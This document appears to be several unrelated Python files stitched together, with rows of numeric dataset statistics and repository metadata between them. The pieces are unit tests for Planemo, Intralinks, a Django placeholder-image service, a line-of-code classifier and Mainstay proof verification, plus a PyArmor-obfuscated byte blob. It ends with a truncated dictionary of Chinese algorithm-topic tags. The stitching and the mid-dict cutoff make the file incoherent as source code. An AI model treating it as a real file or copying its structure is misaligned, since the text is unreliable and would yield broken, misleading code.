                    "--tutorial_name", "test",
                    "--workflow", test_workflow,
                ],
                0,
            )

    @skip_if_environ("PLANEMO_SKIP_GALAXY_TESTS")
    def test_training_init_command_tutorial_remote_wf(self):
        """Test training_init command to create new tutorial with workflow on running instance."""
        with self._isolate():
            # A remote workflow id without server credentials fails.
            self._check_training_init(
                [
                    "--topic_name", "test",
                    "--tutorial_name", "test",
                    "--workflow_id", "ID",
                ],
                1,
            )
            # With a Galaxy URL and API key the command succeeds.
            self._check_training_init(
                [
                    "--topic_name", "test",
                    "--tutorial_name", "test",
                    "--workflow_id", "ID",
                    "--galaxy_url", "https://usegalaxy.eu/",
                    "--galaxy_api_key", "API",
                ],
                0,
            )
| 38.969697
| 98
| 0.566291
| 528
| 5,144
| 5.096591
| 0.151515
| 0.205128
| 0.254181
| 0.188034
| 0.819398
| 0.800818
| 0.758454
| 0.758454
| 0.730955
| 0.730955
| 0
| 0.007196
| 0.32465
| 5,144
| 131
| 99
| 39.267176
| 0.767415
| 0.127138
| 0
| 0.601942
| 0
| 0
| 0.225428
| 0.044635
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067961
| false
| 0
| 0.019417
| 0
| 0.097087
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
17dcdec873c4fdf82972b1527550010a61eb050d
| 329
|
py
|
Python
|
intralinks_test/folders_v1_test.py
|
ilapi/intralinks-sdk-python
|
dcf789d874d907833aa48557309c3e12e4703a4e
|
[
"MIT"
] | 3
|
2019-02-28T14:46:54.000Z
|
2021-01-07T22:41:35.000Z
|
intralinks_test/folders_v1_test.py
|
ilapi/intralinks-sdk-python
|
dcf789d874d907833aa48557309c3e12e4703a4e
|
[
"MIT"
] | 5
|
2018-12-12T10:08:18.000Z
|
2018-12-17T13:45:56.000Z
|
intralinks_test/folders_v1_test.py
|
ilapi/intralinks-sdk-python
|
dcf789d874d907833aa48557309c3e12e4703a4e
|
[
"MIT"
] | 1
|
2019-02-28T14:46:35.000Z
|
2019-02-28T14:46:35.000Z
|
import intralinks_test.folders_helper
def test_create_update_delete_folder(v1_client, test_data):
    """Run the shared create/update/delete folder scenario against the v1 client.

    Thin wrapper: delegates to the shared helper so the same scenario can be
    exercised per client version.
    Presumably ``v1_client`` and ``test_data`` are pytest fixtures — confirm
    against conftest.
    """
    intralinks_test.folders_helper.test_create_update_delete_folder(v1_client, test_data)
def test_create_delete_folders(v1_client, test_data):
    """Run the shared create/delete multiple-folders scenario against the v1 client.

    Thin wrapper: delegates to the shared helper so the same scenario can be
    exercised per client version.
    """
    intralinks_test.folders_helper.test_create_delete_folders(v1_client, test_data)
| 36.555556
| 89
| 0.87234
| 49
| 329
| 5.285714
| 0.265306
| 0.15444
| 0.185328
| 0.247104
| 0.849421
| 0.849421
| 0.849421
| 0.849421
| 0.648649
| 0.409266
| 0
| 0.013072
| 0.069909
| 329
| 8
| 90
| 41.125
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
aa0237b07590a463d2615713d0d72face783ab1b
| 13,794
|
py
|
Python
|
mysite/test.py
|
amid-africa/placeholder
|
0333e469a44eadeee2e90b68dd31e676072905cd
|
[
"MIT"
] | null | null | null |
mysite/test.py
|
amid-africa/placeholder
|
0333e469a44eadeee2e90b68dd31e676072905cd
|
[
"MIT"
] | 5
|
2019-03-20T07:51:37.000Z
|
2022-01-13T01:08:12.000Z
|
mysite/test.py
|
amid-africa/placeholder
|
0333e469a44eadeee2e90b68dd31e676072905cd
|
[
"MIT"
] | 1
|
2019-03-29T11:23:12.000Z
|
2019-03-29T11:23:12.000Z
|
import unittest
from django.test import Client
from PIL import ImageFile
class SimpleTest(unittest.TestCase):
    """Tests for the placeholder-image URL routes.

    Successful routes must return HTTP 200 with an image of the expected
    content type, pixel dimensions and RGB colour mode; malformed widths,
    heights, colours or formats must be rejected with HTTP 404.

    The original version repeated the GET/status/parse/assert sequence in
    every test and carried bare class-level strings instead of method
    docstrings; both are consolidated here without changing any assertion.
    """

    def setUp(self):
        # Every test needs a client.
        self.client = Client()
        # Shared parser for image responses, as in the original tests.
        self.parser = ImageFile.Parser()

    def _assert_404(self, url):
        """Assert that GET *url* is rejected with 404 Not Found."""
        response = self.client.get(url)
        self.assertEqual(response.status_code, 404)

    def _assert_image(self, url, content_type="image/png", size=None,
                      normalize_type=False):
        """GET *url* and validate status, content type and image properties.

        :param url: path (plus optional query string) to request.
        :param content_type: expected ``Content-Type`` header value.
        :param size: optional ``(width, height)`` the decoded image must have.
        :param normalize_type: lower-case the response header before comparing,
            matching the original format tests which used ``.lower()``.
        """
        response = self.client.get(url)
        # Check that the response is 200 OK.
        self.assertEqual(response.status_code, 200)
        header = response['Content-Type']
        if normalize_type:
            header = header.lower()
        self.assertEqual(content_type, header)
        # Feed the shared parser and check the decoded image.
        # NOTE(review): the parser instance is reused across responses within
        # a test, exactly as the original code did; after the first complete
        # image it may keep reporting that image's properties — confirm before
        # relying on size/mode checks for any response after the first.
        self.parser.feed(response.content)
        if size is not None:
            self.assertEqual(self.parser.image.size[0], size[0])
            self.assertEqual(self.parser.image.size[1], size[1])
        # All placeholders are expected to render in RGB mode.
        self.assertEqual(self.parser.image.mode, 'RGB')

    def test_home(self):
        """The home page responds with 200 OK."""
        response = self.client.get('')
        self.assertEqual(response.status_code, 200)

    def test_placeholder_width_only(self):
        """A width-only URL yields a square 200x200 RGB PNG."""
        self._assert_image('/200/', size=(200, 200))

    def test_fail_placeholder_width_only(self):
        """Width-only URLs with incorrect values return 404."""
        # Rubbish, zero, and out-of-range (max width is 1920) values.
        for url in ('/ffffff/', '/0/', '/1921/'):
            self._assert_404(url)

    def test_placeholder_width_height(self):
        """A width+height URL yields a 600x400 RGB PNG."""
        # Width must be 1..1920 and height 1..1080.
        self._assert_image('/600/400/', size=(600, 400))

    def test_fail_placeholder_width_height(self):
        """Width+height URLs with incorrect values return 404."""
        # Non-numeric, zero, and out-of-range pairs, including mixes of
        # one good and one bad dimension.
        for url in (
            '/rubbish/rubbish/', '/rubbish/600/', '/400/rubbish/',
            '/0/0/', '/0/400/', '/400/0/',
            '/1921/1081/', '/400/1081/', '/1921/400/',
        ):
            self._assert_404(url)

    def test_placeholder_background(self):
        """A trailing six-digit hex colour sets the background; output stays RGB PNG."""
        self._assert_image('/200/aabbcc/')
        self._assert_image('/200/400/11ffaa/')

    def test_fail_placeholder_background(self):
        """Background colours that are not exactly six hex digits return 404."""
        # Too short, non-hex, too long, and out-of-hex-range values.
        for url in ('/200/400/fff/', '/200/400/rubish/',
                    '/200/400/aabbccd/', '/200/400/gggggg/'):
            self._assert_404(url)

    def test_placeholder_background_foreground(self):
        """Two trailing hex colours set background and foreground; output stays RGB PNG."""
        self._assert_image('/200/123456/789abc/')
        self._assert_image('/200/400/11ffaa/0055cc/')

    def test_fail_placeholder_background_foreground(self):
        """Invalid background/foreground colour combinations return 404."""
        for url in ('/200/400/fff/fff/', '/200/400/112233/fff/',
                    '/200/400/rubish/rubish/', '/200/400/acacac/rubish/'):
            self._assert_404(url)

    def test_placeholder_format(self):
        """A trailing format segment selects the image encoding.

        The original comments labelled every check "JPEG"; the expected
        content types below are what each assertion actually verified.
        """
        self._assert_image('/200/png/', 'image/png', normalize_type=True)
        self._assert_image('/200/400/jpg/', 'image/jpeg', normalize_type=True)
        self._assert_image('/200/400/ffffff/jpeg/', 'image/jpeg', normalize_type=True)
        self._assert_image('/200/400/ffffff/000000/pcx/', 'image/pcx', normalize_type=True)
        self._assert_image('/200/ffffff/000000/gif/', 'image/gif', normalize_type=True)
        self._assert_image('/200/ffffff/bmp/', 'image/bmp', normalize_type=True)

    def test_fail_placeholder_format(self):
        """Rubbish or unsupported formats return 404."""
        for url in ('/200/400/ffffff/000000/rubbish/',
                    '/200/400/ffffff/000000/tiff/'):
            self._assert_404(url)

    def test_unusual_dimensions(self):
        """Edge cases around the overlay text, for coverage."""
        # Very small image: stops text from appearing.
        self._assert_image('/10/15/', size=(10, 15))
        # Second text line shorter than the first.
        self._assert_image('/100/150/?text=x')
        # Blank second text line.
        self._assert_image('/100/150/?text=')
| 39.982609
| 103
| 0.658402
| 1,843
| 13,794
| 4.888768
| 0.074878
| 0.123196
| 0.075916
| 0.088568
| 0.901443
| 0.890122
| 0.873918
| 0.83818
| 0.810766
| 0.794673
| 0
| 0.051545
| 0.244744
| 13,794
| 344
| 104
| 40.098837
| 0.813304
| 0.300638
| 0
| 0.541096
| 0
| 0
| 0.106794
| 0.023431
| 0
| 0
| 0
| 0
| 0.506849
| 1
| 0.089041
| false
| 0
| 0.020548
| 0
| 0.116438
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a4bf19ae9a7b265529da727d4b5cd576331ab710
| 7,634
|
py
|
Python
|
tests/cloc/test_classification_description_selection.py
|
oliverhulett/classify-lines-of-code
|
6ca0d902ebe1ff858d053ce1a98bd47ededb3f1c
|
[
"Apache-2.0"
] | null | null | null |
tests/cloc/test_classification_description_selection.py
|
oliverhulett/classify-lines-of-code
|
6ca0d902ebe1ff858d053ce1a98bd47ededb3f1c
|
[
"Apache-2.0"
] | 4
|
2018-03-08T02:52:29.000Z
|
2018-05-07T23:30:18.000Z
|
tests/cloc/test_classification_description_selection.py
|
oliverhulett/classify-lines-of-code
|
6ca0d902ebe1ff858d053ce1a98bd47ededb3f1c
|
[
"Apache-2.0"
] | null | null | null |
"""
Created on 3 Mar. 2018
@author: oliver
"""
import sys
import unittest2 as unittest
from cloc.classification_description import ClassificationDescription, Matcher
class TestClassificationDescription(unittest.TestCase):
    """Tests for matcher selection in ClassificationDescription.

    setUp builds one description tree (two flat top-level sections plus one
    section with nested subsections) together with a parallel ``self.matchers``
    dict of the Matcher objects the description is expected to produce. Each
    test then checks which matchers are active for a given file path, or which
    become active after a line/entry/exit matcher fires.
    """

    def setUp(self):
        # Show full diffs on failures involving these nested structures.
        self.maxDiff = None
        self.description = ClassificationDescription()
        self.description.add_descriptions(
            {
                # Line section: classifies individual lines by regex.
                "top-level-1": {
                    "path_regex": "path-regex-1",
                    "line_regex": "line-regex-1",
                    "classifications": ["classification-1"],
                },
                # Region section: delimited by entry/exit regexes.
                "top-level-2": {
                    "path_regex": "path-regex-2",
                    "entry_regex": "entry-regex-2",
                    "exit_regex": "exit-regex-2",
                    "classifications": ["classification-2"],
                },
                # Region section with nested subsections of both kinds.
                "top-level-3": {
                    "path_regex": "path-regex-3",
                    "entry_regex": "entry-regex-3",
                    "exit_regex": "exit-regex-3",
                    "classifications": ["classification-3"],
                    "subsections": {
                        "nested-1": {"line_regex": "line-regex-3-1", "classifications": ["classification-3-1"]},
                        "nested-2": {
                            "entry_regex": "entry-regex-3-2",
                            "exit_regex": "exit-regex-3-2",
                            "classifications": ["classification-3-2"],
                        },
                    },
                },
            }
        )
        # Expected Matcher objects, keyed to mirror the description above.
        self.matchers = {
            "top-level-1": {
                "line": Matcher(Matcher.RE_TYPE_LINE, ["top-level-1"], "line-regex-1", ["classification-1"])
            },
            "top-level-2": {
                "entry": Matcher(Matcher.RE_TYPE_ENTRY, ["top-level-2"], "entry-regex-2", ["classification-2"]),
                "exit": Matcher(Matcher.RE_TYPE_EXIT, ["top-level-2"], "exit-regex-2", ["classification-2"]),
            },
            "top-level-3": {
                "entry": Matcher(Matcher.RE_TYPE_ENTRY, ["top-level-3"], "entry-regex-3", ["classification-3"]),
                "exit": Matcher(Matcher.RE_TYPE_EXIT, ["top-level-3"], "exit-regex-3", ["classification-3"]),
                "nested-1": {
                    "line": Matcher(
                        Matcher.RE_TYPE_LINE, ["top-level-3", "nested-1"], "line-regex-3-1", ["classification-3-1"]
                    )
                },
                # NOTE(review): the description above declares
                # "entry-regex-3-2"/"exit-regex-3-2" for nested-2, but these
                # expected matchers carry "line-regex-3-2". Confirm whether
                # Matcher equality ignores the regex string or this is a
                # latent typo in the fixture.
                "nested-2": {
                    "entry": Matcher(
                        Matcher.RE_TYPE_ENTRY, ["top-level-3", "nested-2"], "line-regex-3-2", ["classification-3-2"]
                    ),
                    "exit": Matcher(
                        Matcher.RE_TYPE_EXIT, ["top-level-3", "nested-2"], "line-regex-3-2", ["classification-3-2"]
                    ),
                },
            },
        }

    def tearDown(self):
        # No per-test cleanup needed; all fixtures are rebuilt in setUp.
        pass

    def test_get_matchers_from_file_single_match(self):
        """A path matching one section activates only that section's matchers."""
        matchers = self.description.get_matchers_for_file("path/to/path-regex-1")
        # assertItemsEqual is the unittest2 (Python 2 era) name for an
        # order-insensitive collection comparison.
        self.assertItemsEqual(matchers, [self.matchers["top-level-1"]["line"]])
        self.assertItemsEqual(matchers, self.description._active_matchers)

    def test_get_matchers_from_file_multiple_matches(self):
        """A path matching two sections activates both sections' matchers."""
        matchers = self.description.get_matchers_for_file("path/to/path-regex-1/path-regex-2")
        self.assertItemsEqual(matchers, [self.matchers["top-level-1"]["line"], self.matchers["top-level-2"]["entry"]])
        self.assertItemsEqual(matchers, self.description._active_matchers)

    def test_get_matchers_from_file_no_match(self):
        """A non-matching path leaves no matchers active, clearing old state."""
        self.description._active_matchers = [
            self.matchers["top-level-1"]["line"],
            self.matchers["top-level-2"]["entry"],
        ]
        matchers = self.description.get_matchers_for_file("path/to/file")
        self.assertItemsEqual(matchers, [])
        self.assertItemsEqual(matchers, self.description._active_matchers)

    def test_get_next_matchers_line_regex_matched(self):
        """A line matcher firing leaves the active set unchanged."""
        self.description._active_matchers = [
            self.matchers["top-level-1"]["line"],
            self.matchers["top-level-2"]["entry"],
        ]
        matchers = self.description.get_next_matchers(self.matchers["top-level-1"]["line"])
        self.assertItemsEqual(matchers, self.description._active_matchers)

    def test_get_next_matchers_entry_regex_matched(self):
        """An entry matcher firing is swapped for its section's exit matcher."""
        self.description._active_matchers = [
            self.matchers["top-level-1"]["line"],
            self.matchers["top-level-2"]["entry"],
        ]
        matchers = self.description.get_next_matchers(self.matchers["top-level-2"]["entry"])
        self.assertItemsEqual(matchers, [self.matchers["top-level-1"]["line"], self.matchers["top-level-2"]["exit"]])
        self.assertItemsEqual(matchers, self.description._active_matchers)

    def test_get_next_matchers_entry_regex_with_subsections_matched(self):
        """Entering a section with subsections also activates their matchers."""
        self.description._active_matchers = [
            self.matchers["top-level-1"]["line"],
            self.matchers["top-level-3"]["entry"],
        ]
        matchers = self.description.get_next_matchers(self.matchers["top-level-3"]["entry"])
        self.assertItemsEqual(
            matchers,
            [
                self.matchers["top-level-1"]["line"],
                self.matchers["top-level-3"]["exit"],
                self.matchers["top-level-3"]["nested-1"]["line"],
                self.matchers["top-level-3"]["nested-2"]["entry"],
            ],
        )
        self.assertItemsEqual(matchers, self.description._active_matchers)

    def test_get_next_matchers_exit_regex_matched(self):
        """An exit matcher firing is swapped back for the section's entry matcher."""
        self.description._active_matchers = [self.matchers["top-level-1"]["line"], self.matchers["top-level-2"]["exit"]]
        matchers = self.description.get_next_matchers(self.matchers["top-level-2"]["exit"])
        self.assertItemsEqual(matchers, [self.matchers["top-level-1"]["line"], self.matchers["top-level-2"]["entry"]])
        self.assertItemsEqual(matchers, self.description._active_matchers)

    def test_get_next_matchers_exit_regex_with_subsection_matched(self):
        """Exiting a section also deactivates its subsections' matchers."""
        self.description._active_matchers = [
            self.matchers["top-level-1"]["line"],
            self.matchers["top-level-3"]["exit"],
            self.matchers["top-level-3"]["nested-1"]["line"],
            self.matchers["top-level-3"]["nested-2"]["entry"],
        ]
        matchers = self.description.get_next_matchers(self.matchers["top-level-3"]["exit"])
        self.assertItemsEqual(matchers, [self.matchers["top-level-1"]["line"], self.matchers["top-level-3"]["entry"]])
        self.assertItemsEqual(matchers, self.description._active_matchers)

    def test_get_next_matchers_multiple_entry_regexes_matched(self):
        """Several entry matchers firing at once are all swapped for their exits."""
        self.description._active_matchers = [
            self.matchers["top-level-2"]["entry"],
            self.matchers["top-level-3"]["entry"],
        ]
        matchers = self.description.get_next_matchers(
            self.matchers["top-level-2"]["entry"], self.matchers["top-level-3"]["entry"]
        )
        self.assertItemsEqual(
            matchers,
            [
                self.matchers["top-level-2"]["exit"],
                self.matchers["top-level-3"]["exit"],
                self.matchers["top-level-3"]["nested-1"]["line"],
                self.matchers["top-level-3"]["nested-2"]["entry"],
            ],
        )
        self.assertItemsEqual(matchers, self.description._active_matchers)
if __name__ == "__main__":
    # Run the suite when this module is executed directly; to run a single
    # test, set e.g.: import sys;sys.argv = ['', 'Test.testName']
    unittest.main()
| 45.171598
| 120
| 0.566282
| 806
| 7,634
| 5.17866
| 0.083127
| 0.103498
| 0.147341
| 0.196454
| 0.81265
| 0.752995
| 0.72712
| 0.72712
| 0.725922
| 0.652611
| 0
| 0.021469
| 0.273906
| 7,634
| 168
| 121
| 45.440476
| 0.731553
| 0.011003
| 0
| 0.369863
| 0
| 0
| 0.217979
| 0.004376
| 0
| 0
| 0
| 0
| 0.116438
| 1
| 0.075342
| false
| 0.006849
| 0.020548
| 0
| 0.10274
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
35361da21c1c1e667efe578b9f6fa2f13762b3a9
| 3,461
|
py
|
Python
|
tests/test_verify.py
|
commerceblock/pymainstay
|
50987e147fd81c1e94b9dec08290cfb30076d3fd
|
[
"MIT"
] | null | null | null |
tests/test_verify.py
|
commerceblock/pymainstay
|
50987e147fd81c1e94b9dec08290cfb30076d3fd
|
[
"MIT"
] | 10
|
2019-11-16T17:46:36.000Z
|
2021-04-30T21:20:40.000Z
|
tests/test_verify.py
|
commerceblock/pymainstay
|
50987e147fd81c1e94b9dec08290cfb30076d3fd
|
[
"MIT"
] | null | null | null |
import sys
import json
import os
import random
import unittest
from io import StringIO
import mst.cmds as cm
import mst.args
class TestVerify(unittest.TestCase):
    """Tests for the mainstay ``verify`` sub-command.

    Each test builds a ``verify`` argument vector, parses it with
    ``mst.args.parse_msc_args`` and asserts on the boolean result of
    ``cm.verify_command``.

    Improvements over the original: the repeated ``raw_args.append`` chains
    are collapsed into a helper, and the bare ``except:`` clauses (which
    would also swallow SystemExit/KeyboardInterrupt) are narrowed to
    ``except Exception``.
    """

    # Three commitments in the order recorded in test_sequence_1.msp.
    ORDERED_COMMITMENTS = (
        "2ec91e4da17e991b2b11d4de76b43fe9a550ce2a59d8b2e0c9dbebc8f5aead5a,"
        "2e93d25081d0c14cfe0d556e0c5c0e4b6b109d50e61f0caa16da33b064c3ac87,"
        "50270593506e065e127e8abfa05205337163ebdeeb1ae45428af8b02cda761c9"
    )
    # The same three commitments with the first two swapped.
    UNORDERED_COMMITMENTS = (
        "2e93d25081d0c14cfe0d556e0c5c0e4b6b109d50e61f0caa16da33b064c3ac87,"
        "2ec91e4da17e991b2b11d4de76b43fe9a550ce2a59d8b2e0c9dbebc8f5aead5a,"
        "50270593506e065e127e8abfa05205337163ebdeeb1ae45428af8b02cda761c9"
    )

    def _verify(self, extra_args, tolerate_errors=False):
        """Run ``verify`` with *extra_args* and return its boolean result.

        :param extra_args: arguments appended after the ``verify`` sub-command.
        :param tolerate_errors: when True, an exception raised by the command
            is reported as a failed verification (``False``) instead of
            propagating, mirroring the original try/except tests.
        """
        args = mst.args.parse_msc_args(['verify'] + list(extra_args))
        if not tolerate_errors:
            return cm.verify_command(args)
        try:
            return cm.verify_command(args)
        except Exception:  # narrowed from a bare except: keep SystemExit/KeyboardInterrupt alive
            return False

    def test_validlist(self):
        """A commitment list in sequence order verifies against a valid proof."""
        self.assertTrue(self._verify(
            ['-f', 'test_sequence_1.msp', '-l', self.ORDERED_COMMITMENTS]))

    def test_unorderedlist(self):
        """A commitment list out of sequence order fails verification."""
        self.assertFalse(self._verify(
            ['-f', 'test_sequence_1.msp', '-l', self.UNORDERED_COMMITMENTS]))

    def test_invalidlistproof(self):
        """A valid list fails against a proof file for a different sequence."""
        self.assertFalse(self._verify(
            ['-f', 'test_sequence_2.msp', '-l', self.ORDERED_COMMITMENTS]))

    def test_validproof(self):
        """A single commitment id present in the sequence verifies."""
        self.assertTrue(self._verify([
            '-f', 'test_sequence_1.msp',
            '-i', '5222ffe08bfd4ca0db30d261b2d54d0b6e3faed5276be422e5e6ac32c450ccd7',
        ]))

    def test_invalidproof(self):
        """A malformed proof file fails (errors count as failure)."""
        self.assertFalse(self._verify(
            ['-f', 'test_sequence_3.msp'], tolerate_errors=True))

    def test_docsequence(self):
        """Documents in the ./files/ directory verify against the sequence."""
        cwd = os.getcwd()
        self.assertTrue(self._verify(
            ['-f', 'test_sequence_1.msp', '-d', cwd + '/files/'],
            tolerate_errors=True))

    def test_docsequenceinvalid(self):
        """Documents in the ./files2/ directory fail verification."""
        cwd = os.getcwd()
        self.assertFalse(self._verify(
            ['-f', 'test_sequence_1.msp', '-d', cwd + '/files2/'],
            tolerate_errors=True))
if __name__ == '__main__':
unittest.main()
| 29.084034
| 221
| 0.659058
| 364
| 3,461
| 6
| 0.162088
| 0.150641
| 0.196429
| 0.044872
| 0.782967
| 0.770604
| 0.770604
| 0.770604
| 0.770604
| 0.770604
| 0
| 0.142315
| 0.238659
| 3,461
| 119
| 222
| 29.084034
| 0.686528
| 0
| 0
| 0.722222
| 0
| 0
| 0.2513
| 0.186597
| 0
| 0
| 0
| 0
| 0.077778
| 1
| 0.077778
| false
| 0
| 0.088889
| 0
| 0.177778
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
102bab79a190e7f57be18c9d302cff1ab66c5c5e
| 1,019
|
py
|
Python
|
Python/windwardrestapi/Api/__init__.py
|
windward-studios/Windward-REST-version-2-Clients
|
8fd467e6f4ece6fcc435609ffb23448d07af3131
|
[
"MIT"
] | null | null | null |
Python/windwardrestapi/Api/__init__.py
|
windward-studios/Windward-REST-version-2-Clients
|
8fd467e6f4ece6fcc435609ffb23448d07af3131
|
[
"MIT"
] | 1
|
2020-10-12T20:32:05.000Z
|
2020-10-12T20:38:04.000Z
|
Python/windwardrestapi/Api/__init__.py
|
windward-studios/Windward-REST-version-2-Clients
|
8fd467e6f4ece6fcc435609ffb23448d07af3131
|
[
"MIT"
] | null | null | null |
__pyarmor__(__name__, __file__, b'\x50\x59\x41\x52\x4d\x4f\x52\x00\x00\x03\x08\x00\x55\x0d\x0d\x0a\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\xb5\x00\x00\x00\x00\x00\x00\x10\x2b\xae\x2a\x43\x7c\x38\x4a\x20\x1d\x05\x53\x57\x17\x4f\xd6\x67\x00\x00\x00\x00\x00\x00\x00\x00\x9c\x5e\x69\xd4\x40\x2e\x02\xc2\xcd\xac\x12\x8e\x22\x8b\xa4\xe3\x1b\x98\x6b\x58\xd1\x42\x09\x09\x1c\x52\x6c\x4d\x81\x4f\xaf\xe1\x51\x42\xbe\x57\xcf\x47\x8f\xb4\xd5\x80\x69\x3a\x85\x37\x36\xe2\x48\xce\xec\xce\xf5\x1d\x10\x1f\x39\x49\xb9\xaf\x5b\x75\xa3\x42\xbf\xe8\xde\xd5\x11\x93\x36\x89\x3b\xc8\x47\xb8\xa1\xe8\xb3\xfa\x31\xec\xa2\x31\x6d\xf7\x28\x28\xce\x0c\x36\x13\x3d\x88\xe7\x25\x7c\x10\x29\xbb\x5f\xf7\xe9\x07\xb1\xe1\xad\x3d\xe9\x69\x67\xfd\x91\x9a\x7b\xd5\xce\xae\xb4\x26\xe7\x12\x4a\x28\x20\xc0\x3e\xd5\x28\xce\x56\xaa\xbb\x2f\x90\x53\xfd\x6d\xbc\xcd\xc6\x12\xc6\xee\xaf\x9f\x8a\xc8\x23\x1e\x4d\xca\x33\x84\x27\x57\x8f\x53\x32\x93\xbe\x3b\x87\x91\x03\x28\xe3\xb2\xd3\x27\x1f\x5e\xc1\x06\xf9\x7b\xf4\x2e\x08\x76\x01', 2)
| 1,019
| 1,019
| 0.749755
| 250
| 1,019
| 3.008
| 0.596
| 0.183511
| 0.203457
| 0.191489
| 0.083777
| 0.083777
| 0.05984
| 0
| 0
| 0
| 0
| 0.332677
| 0.002944
| 1,019
| 1
| 1,019
| 1,019
| 0.40748
| 0
| 0
| 0
| 0
| 1
| 0.960784
| 0.960784
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
105ca16c1583c5d6493176808e02bb755de9ec63
| 47,327
|
py
|
Python
|
oiasg_base/__commons/_vars/knowledge.py
|
will7101/OIASG
|
44badff57689da99a2c9896d176b32e7b51d42b5
|
[
"BSD-3-Clause"
] | 1
|
2018-03-17T10:07:11.000Z
|
2018-03-17T10:07:11.000Z
|
oiasg_base/__commons/_vars/knowledge.py
|
will7101/OIASG
|
44badff57689da99a2c9896d176b32e7b51d42b5
|
[
"BSD-3-Clause"
] | 1
|
2018-03-17T11:35:54.000Z
|
2018-03-17T11:35:54.000Z
|
oiasg_base/__commons/_vars/knowledge.py
|
will7101/OIASG
|
44badff57689da99a2c9896d176b32e7b51d42b5
|
[
"BSD-3-Clause"
] | null | null | null |
tags.update({
0: {
'name': 'root',
'appearance': None,
'parent': None,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
1: {
'name': '算法',
'appearance': None,
'parent': 0,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
2: {
'name': '动态规划',
'appearance': None,
'parent': 1,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
3: {
'name': 'DAG 模型',
'appearance': None,
'parent': 2,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
4: {
'name': '背包 DP',
'appearance': None,
'parent': 3,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
5: {
'name': '数位 DP',
'appearance': None,
'parent': 3,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
6: {
'name': '插头 DP',
'appearance': None,
'parent': 3,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
7: {
'name': '子树 DP',
'appearance': None,
'parent': 3,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
8: {
'name': '区间 DP',
'appearance': None,
'parent': 3,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
9: {
'name': '决策优化',
'appearance': None,
'parent': 2,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
10: {
'name': '分步式转移',
'appearance': None,
'parent': 9,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
11: {
'name': '单调性分治',
'appearance': None,
'parent': 9,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
12: {
'name': '维护移动端点',
'appearance': None,
'parent': 11,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
13: {
'name': '斜率优化',
'appearance': None,
'parent': 11,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
14: {
'name': '四边形不等式',
'appearance': None,
'parent': 11,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
15: {
'name': '网络流',
'appearance': None,
'parent': 1,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
16: {
